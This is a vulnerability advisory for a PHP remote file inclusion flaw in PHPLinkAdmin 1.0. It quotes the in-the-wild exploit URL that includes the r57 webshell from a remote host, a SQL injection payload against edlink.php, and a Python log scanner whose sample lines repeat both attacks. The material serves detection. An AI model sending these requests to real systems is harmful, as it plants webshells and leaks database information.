CVE-2009-1025
published 2009-03-20


Priority: P3 55, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 29.83% (98.0th percentile)
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.

Affected

1 range
Vendor | Product | Version range | Fixed in
beerwin | phplinkadmin | |

Detection & IOCs (extracted from sources)

url: http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt?
domain: www.kortech.cn
path: /bbs//skin/zero_vote/r57.txt
filename: r57.txt
path: /path/linkadmin.php
  • Monitor HTTP requests to linkadmin.php where the 'page' parameter contains an external URL (http:// or https://), indicating a Remote File Inclusion attempt.
  • The RFI payload appends a trailing '?' to the remote URL to nullify any local file extension appended by the include statement — detect this pattern in the 'page' parameter value.
  • The vulnerable include is triggered without authentication ('Direct acces to linkadmin.No auth.'); alert on any unauthenticated access to linkadmin.php with a non-empty 'page' parameter.
  • Detect SQL injection attempts against edlink.php via the 'linkid' parameter, specifically payloads using UNION SELECT with concat_ws to extract user(), database(), and version().
  • The r57 webshell (r57.txt) is the payload delivered via RFI; presence of r57.txt or r57.php on the filesystem or in web logs is a strong indicator of compromise.
  • The vulnerable code uses $_REQUEST['page'] with no sanitization or authentication check, meaning the RFI is exploitable by any unauthenticated remote attacker.
  • The SQL injection in edlink.php also uses $_REQUEST['linkid'] with no sanitization, making it exploitable without authentication as well.
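
The checks listed above can be run over web server access logs. The following is an added example, not part of the original entry or of PHPLinkAdmin: the log lines are constructed, and the finding labels, function names and the extra ftp:// scheme are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Mar/2009:10:01:02 +0000] "GET /path/linkadmin.php'
    '?page=http://attacker.example/r57.txt? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Mar/2009:10:01:09 +0000] "GET /path/edlink.php?linkid=1'
    '+UNION+SELECT+concat_ws(0x3a,user(),database(),version()) HTTP/1.1" 200 812',
    '198.51.100.4 - - [20/Mar/2009:10:02:00 +0000] "GET /path/linkadmin.php'
    '?page=links HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# http/https come from the entry; ftp is an added assumption (also a PHP wrapper).
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)
SQLI_RE = re.compile(r'union\s+(?:all\s+)?select|concat_ws\s*\(', re.I)
WEBSHELL_RE = re.compile(r'\br57\.(?:txt|php)\b', re.I)

def classify(log_line):
    """Return the set of finding labels for one access-log line."""
    findings = set()
    match = REQUEST_RE.search(log_line)
    if not match:
        return findings
    target = urlsplit(match.group(1))
    script = target.path.rsplit('/', 1)[-1].lower()
    # parse_qs percent-decodes values, so %68ttp:// is seen as http://
    params = parse_qs(target.query, keep_blank_values=True)
    if script == 'linkadmin.php':
        for value in params.get('page', []):
            if REMOTE_URL_RE.match(value):
                findings.add('rfi-remote-url')
                # Trailing '?' turns any suffix the include appends into a query string.
                if value.rstrip().endswith('?'):
                    findings.add('rfi-trailing-question-mark')
    if script == 'edlink.php' and any(
            SQLI_RE.search(v) for v in params.get('linkid', [])):
        findings.add('sqli-linkid')
    if WEBSHELL_RE.search(match.group(1)):
        findings.add('r57-reference')
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every line that matched."""
    return [(n, sorted(f)) for n, line in enumerate(lines, 1)
            if (f := classify(line))]

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))
```

Access logs record only the request line, so this covers GET parameters; because the code reads $_REQUEST, the same values sent in a POST body would need request-body logging or a WAF rule to be seen.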